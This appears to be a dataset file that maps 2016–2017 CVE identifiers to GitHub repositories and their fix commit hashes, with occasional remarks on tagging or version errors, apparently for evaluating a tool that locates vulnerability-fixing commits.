-CVE-2016-10703;https://github.com/jfhbrook/node-ecstatic;None:None;False;71ce93988ead4b561a8592168c72143907189f01; -CVE-2016-10735;https://github.com/twbs/bootstrap;None:None;False;bcad4bcb5f5a9ef079b2883a48a698b35261e083; -CVE-2016-10745;https://github.com/pallets/jinja;None:None;False;9b53045c34e61013dc8f09b7e52a555fa16bed16,74bd64e56387f5b2931040dc7235a3509cde1611; -CVE-2016-10750;https://github.com/hazelcast/hazelcast;None:None;False;5a47697519018eb4918df33a21faae811e85f01a,ef4bea032d9f662bd63c690f4c1d6a2bcea6c2a7; vulnerable tag is fixed + commit timestamp is outside the time interval -CVE-2016-1000232;https://github.com/salesforce/tough-cookie;None:None;False;e4fc2e0f9ee1b7a818d68f0ac7ea696f377b1534,615627206357d997d5e6ff9da158997de05235ae; -CVE-2016-1000236;https://github.com/tj/node-cookie-signature;None:None;False;39791081692e9e14aa62855369e1c7f80fbfd50e; -CVE-2016-1000282;https://github.com/haraka/Haraka;None:None;False;2998b8b0455b8cc2c640344328439e10e685aad9,816af2f47755d36cdcd69f888b173b7ed24d3d89,a772fccad35475dfc66a0ac0c60a60322189f1f5,468fd214ca3ba58ac4b371bd7f7609ca9b1a6699; -CVE-2016-1000338;https://github.com/bcgit/bc-java;None:None;False;b0c3ce99d43d73a096268831d0d120ffc89eac7f; -CVE-2016-1000340;https://github.com/bcgit/bc-java;None:None;False;790642084c4e0cadd47352054f868cc8397e2c00; -CVE-2016-1000343;https://github.com/bcgit/bc-java;None:None;False;50a53068c094d6cff37659da33c9b4505becd389; -CVE-2016-1000344;https://github.com/bcgit/bc-java;None:None;False;9385b0ebd277724b167fe1d1456e3c112112be1f; -CVE-2017-0224;https://github.com/chakra-core/ChakraCore;None:None;False;f022afb8246acc98e74a887bb655ac512caf6e72; -CVE-2017-0904;https://github.com/jtdowney/private_address_check;None:None;False;58a0d7fe31de339c0117160567a5b33ad82b46af; -CVE-2017-0905;https://github.com/recurly/recurly-client-ruby;None:None;False;1bb0284d6e668b8b3d31167790ed6db1f6ccc4be,1605e72ae631d3d300815d23c9eb4d42c1ab2f7e,3b23f442e36a5cc7034abb997312761bd0c15a81,242252e37cdb36cf5bd526855feed388d54a6c7e,9ea7a7dd25778666c3501991df2dabbcfa60f93a,b480ea5118be44dc4a8ee50a501e402be943e9c6,08c4766b75b286193fcd41421d9303fc4d18f1c0,9834a8c6fecffc16f1e9e9c651b67fca07bf64d9,5ff4907e1c1a3d9356e0658ae43cec594b764f09,c8c36508c8acd81768909ad2d155462a9d50a3bd,a6ccc217daa166f8fbc12e32ddeb6d33cf43653e,2ee039868e54eb1bd9a219ff759f008140a9a16b,e540c6535980f216f6d6338c51d11ced3440518b; -CVE-2017-0906;https://github.com/recurly/recurly-client-python;None:None;False;049c74699ce93cf126feff06d632ea63fba36742,c993068ecca65956ec91282f4d15946dcdcf21e0,1af0c48131df43a2f40c41df540ea8b1886c402d,94d08c9ae78448112a61e8586f0253f4dce18485,02d648db134403e53588646084c9cbd9fb0a8177,bd199d12de021bf7e4d3b504d60a11dd0f0beeb6,37762f28f9a3559b603d726e56de899536c4a49d; -CVE-2017-0907;https://github.com/recurly/recurly-client-dotnet;None:None;False;9eef460c0084afd5c24d66220c8b7a381cf9a1f1,54d2f1992096495efb026a97518bb55c5bd70641,56b005dc464132c9c505454042c9d949ace9dc42,c20f49b6cb69564db1af657bdb98aa4ae1da31b5,69aef8ff955b174463e73e234b154eb915787cc3,8e05a530e494e6162997d5a551fefe5ff14d40f0,f0fc3715670a06736b1ba45e7b8a3a525444b524,efe4873ac652f7a992fe1460ec8c9330189b0410,a711b927c8917dd98dc3cecf9f799ba3f3b1d67d; -CVE-2017-0909;https://github.com/jtdowney/private_address_check;None:None;False;516ab853e788f1392f81b59cbe30e136f3836cdf,d1389cbc919aa9e7ef28a34335b104caab73288d,53b55b32dfebd4461a241e09b8af2dbe44d86ce5,6e614921aeee96fa5850f0f667618890754d19a5,6927b2e4ae1ed6c51d1e7639624cf43b0b0e8ba6,4ce63152a1aff6e01e31ff4cc134a485ab018dea; -CVE-2017-0929;https://github.com/dnnsoftware/Dnn.Platform;None:None;False;f7a48e4df93c027325578ff0649733d19e1894fa,d3953db85fee77bb5e6383747692c507ef8b94c3; -CVE-2017-2582;https://github.com/keycloak/keycloak;None:None;False;8a02ef18597e5929517d702238b09ae780eaf421,0cb5ba0f6e83162d221681f47b470c3042eef237; -CVE-2017-2592;https://github.com/openstack/oslo.middleware;None:None;False;ec073669a49267abcb0c1d776b9050342dac5a4a,6c0f50c1f5f4122b31dbfe25aacdce596bf4b648; -CVE-2017-2617;https://github.com/hawtio/hawtio;None:None;False;8cf6848f4d4d4917a4551c9aa49dc00f699eb569; -CVE-2017-2638;https://github.com/infinispan/infinispan;None:None;False;f2d54c4ecb75c7264d4160ca7c461135712201a9; -CVE-2017-2649;https://github.com/jenkinsci/active-directory-plugin;None:None;False;a5e92137dc1f892ebfb3e371725b787860ddb539,063c282ad258c020f1776a6c4b3d1b3f95d74aef; -CVE-2017-2652;https://github.com/jenkinsci/distfork-plugin;None:None;False;312bad498c9bce23a66bd2aba20d0d3de1e0cf8d; -CVE-2017-2667;https://github.com/theforeman/hammer-cli;None:None;False;74b926ae24f47f1d93b778e06b64935e57b60e33; -CVE-2017-2670;https://github.com/undertow-io/undertow;None:None;False;08d6eaf61dab51403990e1fffa4c1d53212e4722,3ad7537d0bfeed5950afda0428ea704e5f00d815,9bfe9fbbb595d51157b61693f072895f7dbadd1d; -CVE-2017-2809;https://github.com/tomoh1r/ansible-vault;None:None;False;3f8f659ef443ab870bb19f95d43543470168ae04; -CVE-2017-3156;https://github.com/apache/cxf;None:None;False;1338469f7d25cfcda75b547c68bed95bd97903ac,e66ce235ee5f8dbde467c8c23eeb622b072d0bf3,555843f9563ccfc2ca1afb2950aebb4505d7711b; -CVE-2017-3204;https://github.com/golang/crypto;None:None;False;e4e2799dd7aab89f583e1d898300d96367750991; -CVE-2017-4952;https://github.com/vmware-archive/xenon;None:None;False;ec30db9afada9cb52852082ce4d7d0095524f3b3,c23964eb57e846126daef98ef7ed15400313e977,b1fd306047ecdac82661d636ebee801a7f2b3a0a,7a747d82b80cd38d2c11a0d9cdedb71c722a2c75,aac1921a1e5480addb1101a513d93dc25de71b50,1a35836973a695157749b0bbbf45b8b2fdcecbd3,756d893573414eec8635c2aba2345c4dcf10b21c,5682ef8d40569afd00fb9a5933e7706bb5b66713,30ae41bccf418d88b52b35a81efb3c1304b798f8,06b9947cf603ba40fd8b03bfeb2e84528a7ab592; -CVE-2017-4971;https://github.com/spring-projects/spring-webflow;None:None;False;57f2ccb66946943fbf3b3f2165eac1c8eb6b1523,ec3d54d2305e6b6bce12f770fec67fe63008d45b; -CVE-2017-4973;https://github.com/cloudfoundry/uaa;None:None;False;9d44cb0c7c25ccae95bfa1c2d59ce46200c643cb; -CVE-2017-4995;https://github.com/spring-projects/spring-security;None:None;False;947d11f433b78294942cb5ea56e8aa5c3a0ca439,5dee8534cd1b92952d10cc56335b5d5856f48f3b; -CVE-2017-5209;https://github.com/libimobiledevice/libplist;None:None;False;3a55ddd3c4c11ce75a86afbefd085d8d397ff957; -CVE-2017-5537;https://github.com/WeblateOrg/weblate;None:None;False;46e7e58af7fba25f9e68a1e962e339da8e829f3b,abe0d2a29a1d8e896bfe829c8461bf8b391f1079; -CVE-2017-5545;https://github.com/libimobiledevice/libplist;None:None;False;7391a506352c009fe044dead7baad9e22dd279ee; -CVE-2017-5591;https://github.com/poezio/slixmpp;None:None;False;22664ee7b86c8e010f312b66d12590fb47160ad8; -CVE-2017-5594;https://github.com/pagekit/pagekit;None:None;False;e0454f9c037c427a5ff76a57e78dbf8cc00c268b,17cc46211ccb3588cc83be96ffa1b971e38d26f0; -CVE-2017-5637;https://github.com/apache/zookeeper;None:None;False;5fe68506f217246c7ebd96803f9c78e13ec2f11a,0313a0e0b6c47b316271533165e5830d1ca04478,835377f0e1cd215e791ed29c0bcff95e625f299c,6d9fc04c052adbc79bbbb1c63f3f00c816fb8e56; -CVE-2017-5638;https://github.com/apache/struts;None:None;False;352306493971e7d5a756d61780d57a76eb1f519a,6b8272ce47160036ed120a48345d9aa884477228; fixed tag is vulnerable (changed) (adv specify wrong) -CVE-2017-5641;https://github.com/apache/flex-blazeds;None:None;False;f861f0993c35e664906609cad275e45a71e2aaf1; -CVE-2017-5643;https://github.com/apache/camel;None:None;False;8afc5d1757795fde715902067360af5d90f046da,2c6964ae94d8f9a9c9a32e5ae5a0b794e8b8d3be,9f7376abbff7434794f2c7c2909e02bac232fb5b; extracted wrong vers from CPE. -CVE-2017-5645;https://github.com/apache/logging-log4j2;None:None;False;5dcc19215827db29c993d0305ee2b0d8dd05939d; -CVE-2017-5858;https://github.com/conversejs/converse.js;None:None;False;e81eaf323ef241f364f0ea8b6abb53439e20efcc; -CVE-2017-5934;https://github.com/moinwiki/moin-1.9;None:None;False;70955a8eae091cc88fd9a6e510177e70289ec024; -CVE-2017-5936;https://github.com/openstack-archive/nova-lxd;None:None;False;1b76cefb92081efa1e88cd8f330253f857028bd2; -CVE-2017-5946;https://github.com/rubyzip/rubyzip;None:None;False;ce4208fdecc2ad079b05d3c49d70fe6ed1d07016; -CVE-2017-5954;https://github.com/commenthol/serialize-to-js;None:None;False;0cea49eeb56eb30f6ee121524b7ea8ed208ab10d,1cd433960e5b9db4c0b537afb28366198a319429; -CVE-2017-7481;https://github.com/ansible/ansible;None:None;False;f0e348f5eeb70c1fb3127d90891da43b5c0a9d29,a1886911fcf4b691130cfc70dfc5daa5e07c46a3,fd30f5328986f9e1da434474481f32bf918a600c,ed56f51f185a1ffd7ea57130d260098686fcc7c2; -CVE-2017-7525;https://github.com/FasterXML/jackson-databind;None:None;False;60d459cedcf079c6106ae7da2ac562bc32dcabe1,6ce32ffd18facac6abdbbf559c817b47fcb622c1; one was wrong from tracer, another was just test files the one in advisory does not exist is from another repo -CVE-2017-7536;https://github.com/hibernate/hibernate-validator;None:None;False;0886e89900d343ea20fde5137c9a3086e6da9ac9,0ed45f37c4680998167179e631113a2c9cb5d113,0778a5c98b817771a645c6f4ba0b28dd8b5437b8; -CVE-2017-7540;https://github.com/svenfuchs/safemode;None:None;False;a019520e441dab1a277fa9aeb41e9266783e9533; was 1.3.2:1.3.3 -CVE-2017-7545;https://github.com/kiegroup/jbpm-designer;None:None;False;a143f3b92a6a5a527d929d68c02a0c5d914ab81d,d9c355a53f0102e71cc668cd8fca440f5f46bdf1,cede7932601439cbc1c3708d0b5bb61f3601abe1; -CVE-2017-7653;https://github.com/eclipse/mosquitto;None:None;False;b11855821e5848fdbb6f66b609b2e1c25c7ddb8a,729a09310a7a56fbe5933b70b4588049da1a42b4; -CVE-2017-7654;https://github.com/eclipse/mosquitto;None:None;False;51ec5601c2ec523bf2973fdc1eca77335eafb8de; -CVE-2017-7656;https://github.com/eclipse/jetty.project;None:None;False;a285deea42fcab60d9edcf994e458c238a348b55; -CVE-2017-7657;https://github.com/eclipse/jetty.project;None:None;False;a285deea42fcab60d9edcf994e458c238a348b55,be8ff431a4b9b2e51c4c847512dfbc70166b8089; -CVE-2017-7660;https://github.com/apache/lucene-solr;None:None;False;e3b0cfff396a7f92a4f621d598780116da916f3f,2f5ecbcf9ed7a3a4fd37b5c55860ad8eace1beae,e912b7cb5c68fbb87b874d41068cf5a3aea17da0,9f91c619a35db89544f5c85795df4128c9f0d96a; -CVE-2017-7661;https://github.com/apache/cxf-fediz;None:None;False;acdbe8c213576792dd95d87315bcc181ea61b57f,f368c472e7beb26f8ca6f818eee8139d8caf2e6e,707b8f95395a3a9ba6d2643053578081e91e5673; -CVE-2017-7662;https://github.com/apache/cxf-fediz;None:None;False;c68e4820816c19241568f4a8fe8600bffb0243cd,71480c3f7e516cf0d535fdd5abec63ab455e4d06; -CVE-2017-7666;https://github.com/apache/openmeetings;None:None;False;aadcd3e4eaaba5a6d322eb53f48c3bbb4fd7a5da,44800f8a18c7e9a30b379ef057067cb26181b532; -CVE-2017-7674;https://github.com/apache/tomcat;None:None;False;b94478d45b7e1fc06134a785571f78772fa30fed; -CVE-2017-7675;https://github.com/apache/tomcat;None:None;False;dacb030b85fe0e0b3da87469e23d0f31252fdede,cf181edc9a8c239cde704cffc3c503425bdcae2b; -CVE-2017-7688;https://github.com/apache/openmeetings;None:None;False;13fe2f382240eab90f3050ecb7ea84d7121f4081; -CVE-2017-7860;https://github.com/grpc/grpc;None:None;False;f05359f6975003197d83ec5a1b78893e01000f99,bcd5f12e4bca2ed2c00cddb5ffd046aef6f4fb31,e2869fee8db5f7a94858b551089c45bbb1bd943b,d9314adb8e3bc687d15269c6e25554741ded4ea6,5f13f4898612c136cff1f2d04a91c25b6d4b694a; unknown, version not specified properly -CVE-2017-7861;https://github.com/grpc/grpc;None:None;False;f05359f6975003197d83ec5a1b78893e01000f99,bcd5f12e4bca2ed2c00cddb5ffd046aef6f4fb31,e2869fee8db5f7a94858b551089c45bbb1bd943b,d9314adb8e3bc687d15269c6e25554741ded4ea6,5f13f4898612c136cff1f2d04a91c25b6d4b694a; unknown, version not specified properly -CVE-2017-7957;https://github.com/x-stream/xstream;None:None;False;b3570be2f39234e61f99f9a20640756ea71b1b40,6e546ec366419158b1e393211be6d78ab9604abe; -CVE-2017-8028;https://github.com/spring-projects/spring-ldap;None:None;False;08e8ae289bbd1b581986c7238604a147119c1336; -CVE-2017-8045;https://github.com/spring-projects/spring-amqp;None:None;False;36e55998f6352ba3498be950ccab1d5f4d0ce655,83fe9fdec2c86a57898d56c5e109debd9d5c07d9,296d481f980fcbecbee01244e3644e254470a86e,6e9e00bb5bf0aa88444146db3c2eae138cc7b0a1; -CVE-2017-8046;https://github.com/spring-projects/spring-data-rest;None:None;False;f5bfe5358864de1a15566110de7ad7e5ffb48e99,8f269e28fe8038a6c60f31a1c36cfda04795ab45,824e51a1304bbc8334ac0b96ffaef588177e6ccd; vulnerable tag is fixed, but wrong tagging I believe -CVE-2017-8109;https://github.com/saltstack/salt;None:None;False;8492cef7a5c8871a3978ffc2f6e48b3b960e0151,6e34c2b5e5e849302af7ccd00509929c3809c658; -CVE-2017-8342;https://github.com/Kozea/Radicale;None:None;False;190b1dd795f0c552a4992445a231da760211183b,059ba8dec1f22ccbeab837e288b3833a099cee2d; -CVE-2017-8359;https://github.com/grpc/grpc;None:None;False;aab6992c006be6fb80df73fd9f218365099c016d,6544a2d5d9ecdb64214da1d228886a7d15bbf5c7; -CVE-2017-8418;https://github.com/rubocop/rubocop;None:None;False;dcb258fabd5f2624c1ea0e1634763094590c09d7; -CVE-2017-8658;https://github.com/chakra-core/ChakraCore;None:None;False;d08f260e7edabb2d4f90fd733b01eeaca1915222,63034a01dc508f27ced7099c9cc97babc4aebc1f,2500e1cdc12cb35af73d5c8c9b85656aba6bab4d,5c6fbc61ccc57826e0daaf07a71c2c536614c2ad; -CVE-2017-8932;https://github.com/golang/go;None:None;False;9294fa2749ffee7edbbb817a0ef9fe633136fa9c; -CVE-2017-9096;https://github.com/albfernandez/itext2;None:None;False;ad4259e57412f4b538df3a57c55e814cfe748a72; -CVE-2017-9214;https://github.com/openvswitch/ovs;None:None;False;7b7b186a8d40fc6f287cef2582702181da74bdc3,fafbfa6ea46911aeb0083f166fed215ca71e22b6; -CVE-2017-9265;https://github.com/openvswitch/ovs;None:None;False;1752ea92dc11935e0595d208fdfe8203baf5b55c,050f90662dde1da1ee3cdd209a9b65196a808811; -CVE-2017-9796;https://github.com/apache/geode;None:None;False;02b9646618e074f80b3d5fed0e5b512a34b5897a; -CVE-2017-9841;https://github.com/sebastianbergmann/phpunit;None:None;False;0c1ae1b5324fa10f96129c5679b788cc1ca9468e,284a69fb88a2d0845d23f42974a583d8f59bf5a5; -CVE-2017-10910;https://github.com/mqttjs/MQTT.js;None:None;False;403ba53b838f2d319a0c0505a045fe00239e9923,3323089ee777fcbf2281a3f3a965e2a4cd7c9ad9; -CVE-2017-11173;https://github.com/cyu/rack-cors;None:None;False;42ebe6caa8e85ffa9c8a171bda668ba1acc7a5e6; -CVE-2017-11424;https://github.com/jpadilla/pyjwt;None:None;False;11f30c4050a11b6398d38f505578c9dabeba6c78,37926ea0dd207db070b45473438853447e4c1392; -CVE-2017-11427;https://github.com/onelogin/python-saml;None:None;False;fad881b4432febea69d70691dfed51c93f0de10f; -CVE-2017-11428;https://github.com/onelogin/ruby-saml;None:None;False;048a544730930f86e46804387a6b6fad50d8176f,d7ce607d9f9d996e1046dde09b675c3cf0c01280,a35f7251b86aa3b7caf4a64d8a3451f925e8855c,03af9e33d2d87f4ac9a644c5b0981ded4dca0bb8; -CVE-2017-11467;https://github.com/orientechnologies/orientdb;None:None;False;200535c3183f7db88ee4526bf3316d6bdeddb68e; -CVE-2017-11503;https://github.com/PHPMailer/PHPMailer;None:None;False;dbbc1397c41de56aa3a57c8188d19a345dea5c63; commit timespamt is outside the time interval -CVE-2017-11610;https://github.com/Supervisor/supervisor;None:None;False;dbe0f55871a122eac75760aef511efc3a8830b88,aac3c21893cab7361f5c35c8e20341b298f6462e,90c5df80777bfec03d041740465027f83d22e27b,83060f3383ebd26add094398174f1de34cf7b7f0,058f46141e346b18dee0497ba11203cb81ecb19e; -CVE-2017-11905;https://github.com/chakra-core/ChakraCore;None:None;False;d97375c40cfd2b2376a5c4b6cd34098e1e99e1f1; -CVE-2017-11910;https://github.com/chakra-core/ChakraCore;None:None;False;40232a443c6316a58941572b0a4776b0677975ca; -CVE-2017-12098;https://github.com/sferik/rails_admin;None:None;False;44f09ed72b5e0e917a5d61bd89c48d97c494b41c; -CVE-2017-12158;https://github.com/keycloak/keycloak;None:None;False;d9ffc4fa211bbf2aae49449cb58e02b6ea8cd299,6ea9ed9be8baa7c6971cfbdabecc91555dc561d7; -CVE-2017-12159;https://github.com/keycloak/keycloak;None:None;False;9b75b603e3a5f5ba6deff13cbb45b070bf2d2239,e201f205d162d4d795d294fe065ca20f4005eef2; -CVE-2017-12160;https://github.com/keycloak/keycloak;None:None;False;fea4c54adc6a1fdafb725b89874c389d54b6d04a,96fe4608066d533cc1ff69f23339a710a60e892d; -CVE-2017-12605;https://github.com/opencv/opencv;None:None;False;999f41fb4f4aa94a0cb47256919ae8b5c29ca5f3,72d29259ca741950527c8cca7fb649030c01f658,30f7576029deb8c125ae7688dd57cfa2156a6b72,f0fb665407a1162153930de1ab5a048a4f3d60f9; -CVE-2017-12616;https://github.com/apache/tomcat;None:None;False;07dc0ea2745f0afab6415f22b16a29f1c6de5727; -CVE-2017-12620;https://github.com/apache/opennlp;None:None;False;c2c14e9af7a519aacfde5173f641c86e17ce50ed; -CVE-2017-12622;https://github.com/apache/geode;None:None;False;db4a493efc09600bf0a9778d5274c09b23b16644; -CVE-2017-12624;https://github.com/apache/cxf;None:None;False;a2ce435cf0eedc8158d118d6d275114408d2a376,896bd961cbbb6b8569700e5b70229f78f94ad9dd,8bd915bfd7735c248ad660059c6b6ad26cdbcdf6; -CVE-2017-12629;https://github.com/apache/lucene-solr;None:None;False;926cc4d65b6d2cc40ff07f76d50ddeda947e3cc4,f9fd6e9e26224f26f1542224ce187e04c27b2681,3bba91131b5257e64b9d0a2193e1e32a145b2a23,d8000beebfb13ba0b6e754f84c760e11592d8d14; -CVE-2017-12631;https://github.com/apache/cxf-fediz;None:None;False;e7127129dbc0f4ee83985052085e185e750cebbf,48dd9b68d67c6b729376c1ce8886f52a57df6c45,ccdb12b26ff89e0a998a333e84dd84bd713ac76c; -CVE-2017-12867;https://github.com/simplesamlphp/simplesamlphp;None:None;False;608f24c2d5afd70c2af050785d2b12f878b33c68; -CVE-2017-12868;https://github.com/simplesamlphp/simplesamlphp;None:None;False;caf764cc2c9b68ac29741070ebdf133a595443f1,4bc629658e7b7d17c9ac3fe0da7dc5df71f1b85e; -CVE-2017-12871;https://github.com/simplesamlphp/simplesamlphp;None:None;False;77df6a932d46daa35e364925eb73a175010dc904; -CVE-2017-12873;https://github.com/simplesamlphp/simplesamlphp;None:None;False;a890b60438d4c8bcdcfd770361aedbbe64ad4c74,8cd71966fbd55b7fd67ca8c849eaf1df7ab42462,baba857afb874d8d6cac0fd8e976ff2859a6cd60,90dca835158495b173808273e7df127303b8b953,300d8aa48fe93706ade95be481c68e9cf2f32d1f,e2daf4ceb6e580815c3741384b3a09b85a5fc231; -CVE-2017-13098;https://github.com/bcgit/bc-java;None:None;False;a00b684465b38d722ca9a3543b8af8568e6bad5c; -CVE-2017-14063;https://github.com/AsyncHttpClient/async-http-client;None:None;False;e9f12b29725c567cdb4de98b3302a61ca9d41280,eb9e3347e45319be494db24d285a2aee4396f5d3; -CVE-2017-14136;https://github.com/opencv/opencv;None:None;False;df1a0263299d2875eb51e85351b58d354304da22,aacae2065744adb05e858d327198c7bbe7f452b0; -CVE-2017-14506;https://github.com/geminabox/geminabox;None:None;False;5464f0cebd2e82fbd9fc321d7b5053982429c055,99aaae196c4fc6ae0df28e186ca1e493ae658e02; -CVE-2017-14619;https://github.com/thorsten/phpMyFAQ;None:None;False;30b0025e19bd95ba28f4eff4d259671e7bb6bb86; -CVE-2017-14623;https://github.com/go-ldap/ldap;None:None;False;95ede1266b237bf8e9aa5dce0b3250e51bfefe66,bb09d4b178012d5af4dd3ef600c6ef2b74b639a1; -CVE-2017-14683;https://github.com/geminabox/geminabox;None:None;False;0dc203b6cef5b9f379f2ef6a24a723f852589ee2,a01c4e8b3403624109499dec75eb6ee30bd01a55; -CVE-2017-14695;https://github.com/saltstack/salt;None:None;False;80d90307b07b3703428ecbb7c8bb468e28a9ae6d,206ae23f15cb7ec95a07dee4cbe9802da84f9c42,9ba1f6112fa72627b42eed4c4eea439dce2df31c,31b38f50ebf321a1d14af0868c516a5de865f5a8; -CVE-2017-14735;https://github.com/nahsra/antisamy;None:None;False;e76f02a77afb4e43b897f13d17b5bc1260b8afde; -CVE-2017-15051;https://github.com/nilsteampassnet/teampass;None:None;False;5f16f6bb132138ee04eb1e0debf2bdc7d7b7a15f; -CVE-2017-15052;https://github.com/nilsteampassnet/TeamPass;None:None;False;8f2d51dd6c24f76e4f259d0df22cff9b275f2dd1; -CVE-2017-15053;https://github.com/nilsteampassnet/TeamPass;None:None;False;ef32e9c28b6ddc33cee8a25255bc8da54434af3e; -CVE-2017-15054;https://github.com/nilsteampassnet/TeamPass;None:None;False;9811c9d453da4bd1101ff7033250d1fbedf101fc; -CVE-2017-15055;https://github.com/nilsteampassnet/TeamPass;None:None;False;5f16f6bb132138ee04eb1e0debf2bdc7d7b7a15f; -CVE-2017-15103;https://github.com/heketi/heketi;None:None;False;ed6e9fdecab5994de12547e369af11d0dae18e76,787bae461b23003a4daa4d1d639016a754cf6b00; -CVE-2017-15133;https://github.com/miekg/dns;None:None;False;43913f2f4fbd7dcff930b8a809e709591e4dd79e; -CVE-2017-15278;https://github.com/nilsteampassnet/TeamPass;None:None;False;f5a765381f051fe624386866ddb1f6b5e7eb929b; -CVE-2017-15288;https://github.com/scala/scala;None:None;False;67fcf5ce4496000574676d81ed72e4a6cb9e7757,f3419fc358a8ea6e366538126279da88d4d1fb1f,0f624c5e5bdb39967e208c7c16067c3e6c903f1f,67e1437e55df6789d0883cb8846d12071de75c63,b64ad85d1cfdfff29d0836a66736d6d2b0830c0e; -CVE-2017-15612;https://github.com/lepture/mistune;None:None;False;ab8f7de8bc78c2a88f9e01522b8a3a0aa8cd9416,d6f0b6402299bf5a380e7b4e77bd80e8736630fe; -CVE-2017-15703;https://github.com/apache/nifi;None:None;False;9e2c7be7d3c6a380c5f61074d9a5a690b617c3dc; was 1.4.0.1.5.0 -CVE-2017-15720;https://github.com/apache/airflow;None:None;False;4cf904cf5a7a070bbeaf3a0e985ed2b840276015; -CVE-2017-15728;https://github.com/thorsten/phpMyFAQ;None:None;False;2d2a85b59e058869d7cbcfe2d73fed4a282f2e5b; -CVE-2017-15729;https://github.com/thorsten/phpMyFAQ;None:None;False;867618110feb836e168435548d6c2cbb7c65eda3; -CVE-2017-15730;https://github.com/thorsten/phpMyFAQ;None:None;False;cce47f94375bb0102ab4f210672231dbb854dd0d; -CVE-2017-15731;https://github.com/thorsten/phpMyFAQ;None:None;False;fadb9a70b5f7624a6926b8834d5c6001c210f09c; -CVE-2017-15733;https://github.com/thorsten/phpMyFAQ;None:None;False;ef5a66df4bcfacc7573322af33ce10c30e0bb896; -CVE-2017-15734;https://github.com/thorsten/phpMyFAQ;None:None;False;fa26c52384b010edaf60c525ae5b040f05da9f77; -CVE-2017-15735;https://github.com/thorsten/phpMyFAQ;None:None;False;867618110feb836e168435548d6c2cbb7c65eda3; -CVE-2017-15808;https://github.com/thorsten/phpMyFAQ;None:None;False;a249b4645fb86f6a9fbe5d2344ab1cbdb906b75c; -CVE-2017-15809;https://github.com/thorsten/phpMyFAQ;None:None;False;cb648f0d5690b81647dd5c9efe942ebf6cce7da9; -CVE-2017-15879;https://github.com/keystonejs/keystone;None:None;False;4b019b8cfcb7bea6f800609da5d07e8c8abfc80a; versions/tags do not contain the commit at all (it is a mess) -CVE-2017-15914;https://github.com/borgbackup/borg;None:None;False;75854c1243b29ec5558be6fdefe365cd438abb4c,ea0203bb0de557cd29de5ab0a0efe5f6015ca59d; -CVE-2017-15928;https://github.com/ohler55/ox;None:None;False;e4565dbc167f0d38c3f93243d7a4fcfc391cbfc8; -CVE-2017-16003;https://github.com/felixrieseberg/windows-build-tools;None:None;False;9835d33e68f2cb5e4d148e954bb3ed0221d98e90; -CVE-2017-16006;https://github.com/jonschlinkert/remarkable;None:None;False;43eaf67dd3bb4a850542ad868b59fe75409a17a7,49e24e8f2a431c095ddbb74ecb67cf1cf8f88c47,92d79a99c39a29665f7f4fabc9593f1b30924ca9,49e87b7ae2dc323d83606792a749fb207595249e; -CVE-2017-16007;https://github.com/cisco/node-jose;None:None;False;f92cffb4a0398b4b1158be98423369233282e0af; -CVE-2017-16008;https://github.com/i18next/i18next;None:None;False;34e8e13a2b64708a0aed01092e4dbfd0e5013831; -CVE-2017-16010;https://github.com/i18next/i18next;None:None;False;11f059599889d857d497aa0499355be32df0dbb6,d367309d4427c2d651b0f0b304504cf59c056cab; -CVE-2017-16013;https://github.com/hapijs/hapi;None:None;False;770cc7bad15122f796d938738b7c05b66d2f4b7f; -CVE-2017-16014;https://github.com/http-party/node-http-proxy;None:None;False;07c8d2ee6017264c3d4deac9f42ca264a3740b48; -CVE-2017-16015;https://github.com/caolan/forms;None:None;False;bc01e534a0ff863dedb2026a50bd03153bbc6a5d; -CVE-2017-16016;https://github.com/apostrophecms/sanitize-html;None:None;False;5d205a1005ba0df80e21d8c64a15bb3accdb2403; -CVE-2017-16017;https://github.com/apostrophecms/sanitize-html;None:None;False;7a1deb341b8a9cef807269a1bbcc61207752ea2b; -CVE-2017-16018;https://github.com/restify/node-restify;None:None;False;24c57cef13dced488ca698db72b851cecd687924,d3837a925727d18b03fcd55ecdd534d8a7888d4e,0af5ccab0f3cd779bd2fc30c774c4a4557cd7cc1,a015067232ad62aa035675dc63a46dce31fed3f3; -CVE-2017-16023;https://github.com/sindresorhus/decamelize;None:None;False;76d47d8de360afb574da2e34db87430ce11094e0; -CVE-2017-16025;https://github.com/hapijs/nes;None:None;False;249ba1755ed6977fbc208463c87364bf884ad655; -CVE-2017-16026;https://github.com/request/request;None:None;False;3d31d4526fa4d4e4f59b89cabe194fb671063cdb,29d81814bc16bc79cb112b4face8be6fc00061dd,8902ce12ffed9bf65b3ccc73203f0bc390f156ea; -CVE-2017-16029;https://github.com/henrytseng/hostr;None:None;False;789a00047459fd80b6f0a9701a1378a47fb73ba8; Prospector wrongly retrieves the previous tag as the same to the next one (to fix) -CVE-2017-16031;https://github.com/socketio/socket.io;None:None;False;67b4eb9abdf111dfa9be4176d1709374a2b4ded8,de1afe13172529801e1e091a471441e11ffd85a3; -CVE-2017-16042;https://github.com/tj/node-growl;None:None;False;d71177d5331c9de4658aca62e0ac921f178b0669; vulnerable tag is fixed -CVE-2017-16083;https://github.com/sandy98/node-simple-router;None:None;False;dfdd52e2e80607af433097d940b3834fd96df488; 0.10.0 tag does not exist -CVE-2017-16084;https://github.com/KoryNunn/list-n-stream;None:None;False;99b0b40b34aaedfcdf25da46bef0a06b9c47fb59; this repo has no tags -CVE-2017-16107;https://github.com/Eeems/PooledWebSocket;None:None;False;7b3b4e5c6be6d8a964296fa3c50e38dc07e9701d; -CVE-2017-16136;https://github.com/expressjs/method-override;None:None;False;4c58835a61fdf7a8e070d6f8ecd5379a961d0987; -CVE-2017-16138;https://github.com/broofa/mime;None:None;False;855d0c4b8b22e4a80b9401a81f2872058eae274d,1df903fdeb9ae7eaa048795b8d580ce2c98f40b0; -CVE-2017-16226;https://github.com/browserify/static-eval;None:None;False;c06f1b8c0a0cd1cc989c025fbb4c5776fc661c2c; -CVE-2017-16228;https://github.com/dulwich/dulwich;None:None;False;7116a0cbbda571f7dac863f4b1c00b6e16d6d8d6; -CVE-2017-16244;https://github.com/octobercms/october;None:None;False;4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0; -CVE-2017-16558;https://github.com/contao/contao;None:None;False;6b4a2711edf166c85cfd7a53fed6aea56d4f0544,501cb3cd34d61089b94e7ed78da53977bc71fc3e; -CVE-2017-16570;https://github.com/keystonejs/keystone;None:None;False;4b019b8cfcb7bea6f800609da5d07e8c8abfc80a; How? Prospector finds f08baa4fb4084b7ec9f356d313dcfd6d7d7d0f8b which is the merge commit dated 2017 while the GT has the commits -CVE-2017-16613;https://github.com/openstack-archive/swauth;None:None;False;70af7986265a3defea054c46efc82d0698917298; 